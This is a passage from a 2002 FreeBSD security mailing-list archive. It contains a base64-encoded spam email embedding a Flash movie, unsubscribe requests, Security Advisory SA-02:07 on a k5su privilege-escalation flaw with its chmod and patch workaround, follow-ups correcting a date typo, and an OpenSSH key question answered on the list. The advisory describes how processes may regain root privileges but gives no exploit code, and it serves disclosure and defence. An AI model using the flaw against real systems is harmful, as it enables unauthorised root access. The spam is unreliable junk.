IDxwYXJhbSBOQU1FPSJXTW9kZSIgVkFMVUU9IldpbmRvdyI+DQogIDxwYXJhbSBOQU1FPSJQbGF5 IiBWQUxVRT0iLTEiPg0KICA8cGFyYW0gTkFNRT0iTG9vcCIgVkFMVUU9Ii0xIj4NCiAgPHBhcmFt IE5BTUU9IlF1YWxpdHkiIFZBTFVFPSJIaWdoIj4NCiAgPHBhcmFtIE5BTUU9IlNBbGlnbiIgVkFM VUU+DQogIDxwYXJhbSBOQU1FPSJNZW51IiBWQUxVRT0iLTEiPg0KICA8cGFyYW0gTkFNRT0iQmFz ZSIgVkFMVUU+DQogIDxwYXJhbSBOQU1FPSJTY2FsZSIgVkFMVUU9IlNob3dBbGwiPg0KICA8cGFy YW0gTkFNRT0iRGV2aWNlRm9udCIgVkFMVUU9IjAiPg0KICA8cGFyYW0gTkFNRT0iRW1iZWRNb3Zp ZSIgVkFMVUU9IjAiPg0KICA8cGFyYW0gTkFNRT0iQkdDb2xvciIgVkFMVUU+DQogIDxwYXJhbSBO QU1FPSJTV1JlbW90ZSIgVkFMVUU+DQogIDxwYXJhbSBOQU1FPSJTdGFja2luZyIgVkFMVUU9ImJl bG93Ij48ZW1iZWQgc3JjPSJodHRwOi8vd3d3Lml2aWRlby5jb20udHcvZmxhc2gvdW5jbGUuc3dm IiBxdWFsaXR5PSJoaWdoIiBwbHVnaW5zcGFnZT0iaHR0cDovL3d3dy5tYWNyb21lZGlhLmNvbS9z aG9ja3dhdmUvZG93bmxvYWQvaW5kZXguY2dpP1AxX1Byb2RfVmVyc2lvbj1TaG9ja3dhdmVGbGFz aCIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSI1NTAiIGhlaWdo dD0iMzI0Ij4NCjwvb2JqZWN0Pg0KPC9wPg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4= ------=_NextPart_t75bPXRkhRqbq3HnfAA-- ------=_NextPart_t75bPXRkhRqbq3Hnf-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 3: 7:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from www.yahho.com (28.c210-85-16.ethome.net.tw [210.85.16.28]) by hub.freebsd.org (Postfix) with SMTP id EC55637B417; Fri, 18 Jan 2002 03:07:09 -0800 (PST) Received: from titan by kimo.com with SMTP id Q09smRtxzFPg7roxLZPG; Fri, 18 Jan 2002 19:15:28 +0800 Message-ID: From: J4OYBdUF08g@pavo.seed.net.tw To: FLHe3X9ar9AnPY@tpts8.seed.net.tw Subject: MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_t75bPXRkhRqbq3Hnf" X-Priority: 3 X-MSMail-Priority: Normal Date: Fri, 18 Jan 2002 03:07:09 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_t75bPXRkhRqbq3Hnf Content-Type: multipart/alternative; boundary="----=_NextPart_t75bPXRkhRqbq3HnfAA" ------=_NextPart_t75bPXRkhRqbq3HnfAA Content-Type: text/html; charset="big5" Content-Transfer-Encoding: base64 PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50 PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9YmlnNSI+DQo8bWV0YSBuYW1lPSJHRU5FUkFUT1IiIGNvbnRl bnQ9Ik1pY3Jvc29mdCBGcm9udFBhZ2UgNC4wIj4NCjxtZXRhIG5hbWU9IlByb2dJZCIgY29udGVu dD0iRnJvbnRQYWdlLkVkaXRvci5Eb2N1bWVudCI+DQo8dGl0bGU+t1GmXqj9u1CxoaRIquymuMHb sG2qurT+qP223DwvdGl0bGU+DQo8L2hlYWQ+DQoNCjxib2R5Pg0KDQq3UaZeqP27ULGhpEiq7Ka4 wduwbaq6tP6o/bbcPyCxeqq6qkKkzSC3UbnvsXq7oaFBIHcgDQqn1qjspUikVaq6uvSttqzdrN0g Xl9fX19fX19fX19eIKVWpNGsT63TvkGmWMXKt1Kquql1uGChQSEgDQqkXbdRqNOt0672uqnB27Bt ttyhSCBcKCotKikvIGlWaWRlb7tQp0GqurLEpECmuMHbsG08YnI+DQo8YSBocmVmPSJodHRwOi8v d3d3Lml2aWRlby5jb20udHciPmh0dHA6Ly93d3cuaXZpZGVvLmNvbS50dzwvYT48YnI+DQo8YSBo cmVmPSJodHRwOi8vd3d3Lml2aWRlby5jb20udHcvZmxhc2gvcm9tYW5jZS5hc3AiPmh0dHA6Ly93 d3cuaXZpZGVvLmNvbXR3L2ZsYXNoL3JvbWFuY2UuYXNwPC9hPg0KPHA+oUA8L3A+DQo8cD6hQA0K PG9iamVjdCBjbGFzc2lkPSJjbHNpZDpEMjdDREI2RS1BRTZELTExY2YtOTZCOC00NDQ1NTM1NDAw MDAiIGNvZGVCYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2 ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NCwwLDIsMCIgaGVpZ2h0PSIzMjQiIHdp ZHRoPSI1NTAiPg0KICA8cGFyYW0gTkFNRT0iX2N4IiBWQUxVRT0iMTQ1NTIiPg0KICA8cGFyYW0g TkFNRT0iX2N5IiBWQUxVRT0iODU3MyI+DQogIDxwYXJhbSBOQU1FPSJNb3ZpZSIgVkFMVUU9Imh0 dHA6Ly93d3cuaXZpZGVvLmNvbS50dy9mbGFzaC91bmNsZS5zd2YiPg0KICA8cGFyYW0gTkFNRT0i U3JjIiBWQUxVRT0iaHR0cDovL3d3dy5pdmlkZW8uY29tLnR3L2ZsYXNoL3VuY2xlLnN3ZiI+DQog IDxwYXJhbSBOQU1FPSJXTW9kZSIgVkFMVUU9IldpbmRvdyI+DQogIDxwYXJhbSBOQU1FPSJQbGF5 IiBWQUxVRT0iLTEiPg0KICA8cGFyYW0gTkFNRT0iTG9vcCIgVkFMVUU9Ii0xIj4NCiAgPHBhcmFt IE5BTUU9IlF1YWxpdHkiIFZBTFVFPSJIaWdoIj4NCiAgPHBhcmFtIE5BTUU9IlNBbGlnbiIgVkFM VUU+DQogIDxwYXJhbSBOQU1FPSJNZW51IiBWQUxVRT0iLTEiPg0KICA8cGFyYW0gTkFNRT0iQmFz ZSIgVkFMVUU+DQogIDxwYXJhbSBOQU1FPSJTY2FsZSIgVkFMVUU9IlNob3dBbGwiPg0KICA8cGFy YW0gTkFNRT0iRGV2aWNlRm9udCIgVkFMVUU9IjAiPg0KICA8cGFyYW0gTkFNRT0iRW1iZWRNb3Zp ZSIgVkFMVUU9IjAiPg0KICA8cGFyYW0gTkFNRT0iQkdDb2xvciIgVkFMVUU+DQogIDxwYXJhbSBO QU1FPSJTV1JlbW90ZSIgVkFMVUU+DQogIDxwYXJhbSBOQU1FPSJTdGFja2luZyIgVkFMVUU9ImJl bG93Ij48ZW1iZWQgc3JjPSJodHRwOi8vd3d3Lml2aWRlby5jb20udHcvZmxhc2gvdW5jbGUuc3dm IiBxdWFsaXR5PSJoaWdoIiBwbHVnaW5zcGFnZT0iaHR0cDovL3d3dy5tYWNyb21lZGlhLmNvbS9z aG9ja3dhdmUvZG93bmxvYWQvaW5kZXguY2dpP1AxX1Byb2RfVmVyc2lvbj1TaG9ja3dhdmVGbGFz aCIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSI1NTAiIGhlaWdo dD0iMzI0Ij4NCjwvb2JqZWN0Pg0KPC9wPg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4= ------=_NextPart_t75bPXRkhRqbq3HnfAA-- ------=_NextPart_t75bPXRkhRqbq3Hnf-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 4:38:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw-nl5.philips.com (gw-nl5.philips.com [212.153.235.99]) by hub.freebsd.org (Postfix) with ESMTP id 80CCE37B416 for ; Fri, 18 Jan 2002 04:38:24 -0800 (PST) Received: from smtpscan-nl3.philips.com (localhost.philips.com [127.0.0.1]) by gw-nl5.philips.com with ESMTP id NAA11369 for ; Fri, 18 Jan 2002 13:38:23 +0100 (MET) (envelope-from guy.bruens@philips.com) From: guy.bruens@philips.com Received: from smtpscan-nl3.philips.com(130.139.36.23) by gw-nl5.philips.com via mwrap (4.0a) id xma011352; Fri, 18 Jan 02 13:38:23 +0100 Received: from smtprelay-nl1.philips.com (localhost [127.0.0.1]) by smtpscan-nl3.philips.com (8.9.3/8.8.5-1.2.2m-19990317) with ESMTP id NAA21882 for ; Fri, 18 Jan 2002 13:38:21 +0100 (MET) Received: from ehv501soh.diamond.philips.com (e3soh01.diamond.philips.com [130.139.54.213]) by smtprelay-nl1.philips.com (8.9.3/8.8.5-1.2.2m-19990317) with ESMTP id NAA16996 for ; Fri, 18 Jan 2002 13:38:21 +0100 (MET) To: freebsd-security@FreeBSD.ORG Subject: unsubscribe X-Mailer: Lotus Notes Release 5.0.5 September 22, 2000 Message-ID: Date: Fri, 18 Jan 2002 13:35:05 +0100 X-MIMETrack: Serialize by Router on ehv501soh/H/SERVER/PHILIPS(Release 5.0.5 |September 22, 2000) at 18/01/2002 13:38:54, Serialize complete at 18/01/2002 13:38:54 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="=_alternative 00456D1AC1256B45_=" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multipart message in MIME format. --=_alternative 00456D1AC1256B45_= Content-Type: text/plain; charset="us-ascii" unsubscribe --=_alternative 00456D1AC1256B45_= Content-Type: text/html; charset="us-ascii"
unsubscribe --=_alternative 00456D1AC1256B45_=-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 5:57:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9305E37B41C; Fri, 18 Jan 2002 05:56:43 -0800 (PST) Received: (from nectar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g0IDuh995329; Fri, 18 Jan 2002 05:56:43 -0800 (PST) (envelope-from security-advisories@freebsd.org) Date: Fri, 18 Jan 2002 05:56:43 -0800 (PST) Message-Id: <200201181356.g0IDuh995329@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-02:07.k5su Reply-To: security-advisories@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-02:07 Security Advisory FreeBSD, Inc. Topic: Kerberos 5 su command uses getlogin for authorization Category: krb5, ports Module: crypto/heimdal/appl/su, heimdal Announced: 2002-01-18 Credits: Aaron Affects: FreeBSD 4.4-RELEASE FreeBSD 4.4-STABLE prior to the correction date Ports collection prior to the correction date Corrected: 2002-01-15 21:52:48 UTC (RELENG_4) 2002-01-17 15:45:05 UTC (RELENG_4_4) 2002-10-31 19:58:05 UTC (heimdal port) FreeBSD only: NO I. Background The getlogin and setlogin system calls are used to manage the user name associated with a login session. k5su is a Kerberos 5-enabled su program. Like su, it allows authorized users to `switch user' in order to obtain additional privileges. II. Problem Description The setlogin system call, the use of which is restricted to the superuser, is used to associate a user name with a login session. The getlogin system call is used to retrieve that user name. The setlogin system call is typically used by applications such as login and sshd. The k5su command included with FreeBSD, versions prior to 4.5-RELEASE, and the su command included in the heimdal port, versions prior to heimdal-0.4e_2, use the getlogin system call in order to determine whether the currently logged-in user is `root'. In some circumstances, it is possible for a non-privileged process to have `root' as the login name returned by getlogin. The `k5su' command may be installed as part of FreeBSD when Kerberos 5 support is requested, or it may be installed from the FreeBSD Ports Collection (ports/security/heimdal), in which case it is installed simply as `su'. The Heimdal port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 6000 third-party applications in a ready-to-install format. The ports collection shipped with FreeBSD 4.4 contains this problem since it was discovered after the release. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact In some circumstances, process that have been started by root but have given up superuser privileges may be able to invoke `k5su' to regain superuser privileges. IV. Workaround Commands to be executed as root are signified by lines starting with the `#' character. [Kerberos 5 in the base system] Remove the set-user-ID bit from the `k5su' executable by running the following command as root: # chmod u-s /usr/bin/k5su [Heimdal port] Remove the set-user-ID bit from the `su' executable by running the following command as root: # chmod u-s /usr/local/bin/su V. Solution [Kerberos 5 in the base system] NOTE: If the file /usr/bin/k5su does not exist on your system, Kerberos 5 is not installed and you do not need to take any action. Do one of the following: 1) Upgrade your system to 4.4-STABLE or the RELENG_4_4 security branch, dated after the respective correction dates. 2) To patch your present system: The following patch has been verified to apply to FreeBSD 4.4-RELEASE and 4.4-STABLE dated prior to the correction date. It may or may not apply to older, unsupported versions of FreeBSD. Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility. # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-02:07/k5su.patch # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-02:07/k5su.patch.asc Execute the following commands as root: # cd /usr/src # patch < /path/to/k5su.patch # cd /usr/src/kerberos5/lib # env MAKE_KERBEROS5=yes make depend # env MAKE_KERBEROS5=yes make all install # cd /usr/src/kerberos5/usr.bin/k5su # env MAKE_KERBEROS5=yes make depend # env MAKE_KERBEROS5=yes make all install [Heimdal port] Do one of the following: 1) Upgrade your entire ports collection and rebuild the port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from the following directories: [i386] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/security/heimdal-0.4e_2.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/security/heimdal-0.4e_2.tgz [alpha] Packages are not automatically generated for the alpha architecture at this time due to lack of build resources. 3) Download a new port skeleton for the heimdal port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz VI. Correction details The following list contains the revision numbers of each file that was corrected in the FreeBSD ports collection. [Kerberos 5 in the base system] Path Revision Branch - ------------------------------------------------------------------------- src/crypto/heimdal/appl/su/su.c HEAD 1.1.1.4 RELENG_4 1.1.1.1.2.2 RELENG_4_4 1.1.1.1.2.1.4.1 RELENG_4_3 1.1.1.1.2.1.2.1 - ------------------------------------------------------------------------- [Heimdal port] Path Revision - ------------------------------------------------------------------------- ports/security/heimdal/Makefile 1.46 ports/security/heimdal/patch-appl::su::su.c 1.1 - ------------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBPEgo31UuHi5z0oilAQGegQP/U3IsWQ75B/VqWU7/V5i4O9yDfQBzj/jZ iZXXvzMQVHZmgMnBo015UCZGqKci4fXw4+TY1YNcqdLln43hJg3TizJuhLFUOwge e8JN52w9gMknKDmpTTJAsW94FwOy/YwTn36Xlxzd4juiRlLm4F0Jmz37gCnfG7vB WSvAJjOX77I= =+CLY -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 7: 3:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mcqueen.wolfsburg.de (pns.wobline.de [212.68.68.5]) by hub.freebsd.org (Postfix) with ESMTP id DC4AD37B404 for ; Fri, 18 Jan 2002 07:03:08 -0800 (PST) Received: from colt.ncptiddische.net (ppp-169.wobline.de [212.68.69.177]) by mcqueen.wolfsburg.de (8.11.3/8.11.3/tw-20010821) with ESMTP id g0IF34a29290 for ; Fri, 18 Jan 2002 16:03:05 +0100 Received: from tisys.org (jodie.ncptiddische.net [192.168.0.2]) by colt.ncptiddische.net (8.11.6/8.11.6) with ESMTP id g0IF4gX01806 for ; Fri, 18 Jan 2002 16:04:43 +0100 (CET) (envelope-from nils@tisys.org) Received: (from nils@localhost) by tisys.org (8.11.6/8.11.6) id g0IF3aL97861 for freebsd-security@FreeBSD.ORG; Fri, 18 Jan 2002 16:03:36 +0100 (CET) (envelope-from nils) Date: Fri, 18 Jan 2002 16:03:36 +0100 From: Nils Holland To: FreeBSD Security Advisories Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:07.k5su Message-ID: <20020118160336.A97707@tisys.org> Mail-Followup-To: FreeBSD Security Advisories References: <200201181356.g0IDuh995329@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200201181356.g0IDuh995329@freefall.freebsd.org>; from security-advisories@FreeBSD.ORG on Fri, Jan 18, 2002 at 05:56:43AM -0800 X-Operating-System: FreeBSD jodie.ncptiddische.net 4.5-RC FreeBSD 4.5-RC X-Machine-Uptime: 4:00PM up 1:46, 1 user, load averages: 0.44, 0.66, 0.45 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jan 18, 2002 at 05:56:43AM -0800, FreeBSD Security Advisories stood up and spoke: > Corrected: 2002-01-15 21:52:48 UTC (RELENG_4) > 2002-01-17 15:45:05 UTC (RELENG_4_4) > 2002-10-31 19:58:05 UTC (heimdal port) Seems that we're gonna have to wait a *LONG* time before it gets corrected in the ports collection, according to this advisory ;-) Greetings Nils -- Nils Holland Ti Systems - FreeBSD in Tiddische, Germany http://www.tisys.org * nils@tisys.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 7:33: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 4C79837B404 for ; Fri, 18 Jan 2002 07:33:04 -0800 (PST) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id BA29A2D; Fri, 18 Jan 2002 09:33:03 -0600 (CST) Received: (from nectar@localhost) by madman.nectar.cc (8.11.6/8.11.6) id g0IFX2p42060; Fri, 18 Jan 2002 09:33:02 -0600 (CST) (envelope-from nectar) Date: Fri, 18 Jan 2002 09:33:02 -0600 From: "Jacques A. Vidrine" To: Nils Holland Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:07.k5su Message-ID: <20020118153302.GA42023@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Nils Holland , freebsd-security@FreeBSD.ORG References: <200201181356.g0IDuh995329@freefall.freebsd.org> <20020118160336.A97707@tisys.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020118160336.A97707@tisys.org> User-Agent: Mutt/1.3.25i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jan 18, 2002 at 04:03:36PM +0100, Nils Holland wrote: > On Fri, Jan 18, 2002 at 05:56:43AM -0800, FreeBSD Security Advisories stood up and spoke: > > > Corrected: 2002-01-15 21:52:48 UTC (RELENG_4) > > 2002-01-17 15:45:05 UTC (RELENG_4_4) > > 2002-10-31 19:58:05 UTC (heimdal port) > > Seems that we're gonna have to wait a *LONG* time before it gets corrected > in the ports collection, according to this advisory ;-) Gah! Thanks for catching that ;-) It will be corrected in a later revision. -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 7:34:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 0E41B37B402 for ; Fri, 18 Jan 2002 07:34:34 -0800 (PST) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 8B29C4C; Fri, 18 Jan 2002 09:34:34 -0600 (CST) Received: (from nectar@localhost) by madman.nectar.cc (8.11.6/8.11.6) id g0IFYYS42067; Fri, 18 Jan 2002 09:34:34 -0600 (CST) (envelope-from nectar) Date: Fri, 18 Jan 2002 09:34:34 -0600 From: "Jacques A. Vidrine" To: Nils Holland Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:07.k5su Message-ID: <20020118153434.GB42023@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Nils Holland , freebsd-security@FreeBSD.ORG References: <200201181356.g0IDuh995329@freefall.freebsd.org> <20020118160336.A97707@tisys.org> <20020118153302.GA42023@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020118153302.GA42023@madman.nectar.cc> User-Agent: Mutt/1.3.25i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jan 18, 2002 at 09:33:02AM -0600, Jacques A. Vidrine wrote: > On Fri, Jan 18, 2002 at 04:03:36PM +0100, Nils Holland wrote: > > On Fri, Jan 18, 2002 at 05:56:43AM -0800, FreeBSD Security Advisories stood up and spoke: > > > > > Corrected: 2002-01-15 21:52:48 UTC (RELENG_4) > > > 2002-01-17 15:45:05 UTC (RELENG_4_4) > > > 2002-10-31 19:58:05 UTC (heimdal port) > > > > Seems that we're gonna have to wait a *LONG* time before it gets corrected > > in the ports collection, according to this advisory ;-) > > Gah! Thanks for catching that ;-) It will be corrected in a later > revision. And just to be clear, it is the year that needs correcting ... the port is good to go. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 11:23:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail01.edsamail.com.ph (mail01.edsamail.com.ph [210.16.71.2]) by hub.freebsd.org (Postfix) with SMTP id 0D1B837B404 for ; Fri, 18 Jan 2002 11:23:24 -0800 (PST) Received: (qmail 2749 invoked from network); 18 Jan 2002 19:23:22 -0000 Received: from unknown (HELO edsamail.com.ph) (10.2.0.251) by 10.2.0.251 with SMTP; 18 Jan 2002 19:23:22 -0000 X-Mailer: Edsamail 1.31 (Build 1129) Date: Sat, 19 Jan 2002 03:28:30 +0800 From: "mhike ." To: freebsd-security@freebsd.org Subject: subscribe Content-Type: text/plain Message-Id: <20020118192325.0D1B837B404@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org __________________________________ www.edsamail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 15:21:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mta07-svc.ntlworld.com (mta07-svc.ntlworld.com [62.253.162.47]) by hub.freebsd.org (Postfix) with ESMTP id 3C74337B419 for ; Fri, 18 Jan 2002 15:21:49 -0800 (PST) Received: from neildesk.neilmcgann.co.uk ([213.107.105.120]) by mta07-svc.ntlworld.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020118232148.OONB6966.mta07-svc.ntlworld.com@neildesk.neilmcgann.co.uk> for ; Fri, 18 Jan 2002 23:21:48 +0000 Message-Id: <5.1.0.14.0.20020118231321.00a43230@pop.ntlworld.com> X-Sender: neil.mcgann@pop.ntlworld.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 18 Jan 2002 23:22:38 +0000 To: freebsd-security@FreeBSD.ORG From: Neil McGann Subject: openssh problem Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi All, I have a problem with 4.5-RC and openssh 3.0.2 accepting public keys. Normal password authentication via ssh works OK and I have tested the keys on another server running 4.3 (free logon account with to m-net.arbornet.org) with my client (putty V0.45beta) so I know they are valid. When I attempt to logon to my machine I get a message saying 'server refused our key' and when I turn debug messages on in sshd_conf I see PAM failing to authorise type 'publickey'. I get the same message if I have no keys in the authorized_keys file or if the file isn't there at all. Any suggestions or pointers on how to debug this problem? Neil To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 15:40: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from blues.jpj.net (blues.jpj.net [204.97.17.6]) by hub.freebsd.org (Postfix) with ESMTP id 700F337B419 for ; Fri, 18 Jan 2002 15:40:02 -0800 (PST) Received: from localhost (trevor@localhost) by blues.jpj.net (8.11.6/8.11.6) with ESMTP id g0INdx418223; Fri, 18 Jan 2002 18:39:59 -0500 (EST) Date: Fri, 18 Jan 2002 18:39:59 -0500 (EST) From: Trevor Johnson To: Neil McGann Cc: freebsd-security@FreeBSD.ORG Subject: Re: openssh problem In-Reply-To: <5.1.0.14.0.20020118231321.00a43230@pop.ntlworld.com> Message-ID: <20020118182945.B11968-100000@blues.jpj.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Hi All, Hi, Neil. > I have a problem with 4.5-RC and openssh 3.0.2 accepting public keys. > Normal password authentication via ssh works OK and I have tested the keys > on another server running 4.3 (free logon account with to > m-net.arbornet.org) with my client (putty V0.45beta) so I know they are valid. > > When I attempt to logon to my machine I get a message saying 'server > refused our key' and when I turn debug messages on in sshd_conf I see PAM > failing to authorise type 'publickey'. I get the same message if I have no > keys in the authorized_keys file or if the file isn't there at all. Possibly you are connecting with protocol version 2, but you generated a public key for protocol version 1 (or vice versa). Check the FILES section of the ssh-keygen man page (paragraphs about $HOME/.ssh/identity.pub and $HOME/.ssh/id_dsa.pub). Try making a DSA key and putting it in ~/.ssh/authorized_keys2. Protocol version 1 is less secure. If that isn't the problem, try the -v option to the ssh client. -- Trevor Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 15:45:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from ns1.vsat.net (ns1.vsat.net [24.142.102.10]) by hub.freebsd.org (Postfix) with ESMTP id 42D9A37B416 for ; Fri, 18 Jan 2002 15:45:41 -0800 (PST) Received: from localhost (jhart@localhost) by ns1.vsat.net (8.9.3/8.9.3) with SMTP id PAA70887 for ; Fri, 18 Jan 2002 15:57:37 -0800 (PST) (envelope-from jhart@ns1.vsat.net) Date: Fri, 18 Jan 2002 15:57:37 -0800 (PST) From: Jonathan Hart To: freebsd-security@freebsd.org Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org unsubscribe freebsd-security To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 17:33:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from blount.mail.mindspring.net (blount.mail.mindspring.net [207.69.200.226]) by hub.freebsd.org (Postfix) with ESMTP id 5575837B405 for ; Fri, 18 Jan 2002 17:32:58 -0800 (PST) Received: from sdn-ar-004azphoep274.dialsprint.net ([206.133.140.204] helo=p98y) by blount.mail.mindspring.net with smtp (Exim 3.33 #1) id 16R9Gw-0007VK-00; Thu, 17 Jan 2002 04:55:53 -0500 From: YOUR-SITEservicetop@earthlink.net To: Subject: New - Just Curious Date: Thu, 17 Jan 2002 23:47:38 -0700 MIME-Version: 1.0 Content-Type: multipart/mixed; 